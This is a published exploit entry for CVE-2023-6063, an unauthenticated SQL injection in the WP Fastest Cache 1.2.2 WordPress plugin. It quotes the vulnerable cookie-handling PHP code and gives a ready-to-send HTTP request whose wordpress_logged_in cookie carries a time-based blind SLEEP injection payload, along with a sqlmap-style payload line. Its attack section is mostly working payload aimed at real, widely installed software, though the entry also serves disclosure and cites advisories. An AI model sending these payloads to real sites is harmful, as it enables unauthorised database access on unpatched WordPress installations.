WordPress WP Fastest Cache 1.2.2 SQL Injection

# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2# Date: 14.11.2023# Exploit Author: Meryem Taşkın# Vendor Homepage: https://www.wpfastestcache.com/# Software Link: https://wordpress.org/plugins/wp-fastest-cache/# Version: WP Fastest Cache 1.2.2# Tested on: WP Fastest Cache 1.2.2# CVE: CVE-2023-6063 ## DescriptionAn SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication. ## Vuln Code public function is_user_admin(){            global $wpdb;            foreach ((array)$_COOKIE as $cookie_key => $cookie_value){                if(preg_match("/wordpress_logged_in/i", $cookie_key)){                     $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);                     break;                }            }            if(isset($username) && $username){                            $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`                                       FROM `$wpdb->users`                                       INNER JOIN `$wpdb->usermeta`                                       ON `$wpdb->users`.`user_login` = \"$username\" AND  # $username varible is not escaped vulnerable to SQL injection                                       ..... ## ExploitGET / HTTP/1.1Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221Host: meryem.local ## Parameter: Cookie #1* ((custom) HEADER)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg--- ## References- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063) ## Credits- Original Researcher: Alex Sanford- PoC: Meryem Taşkın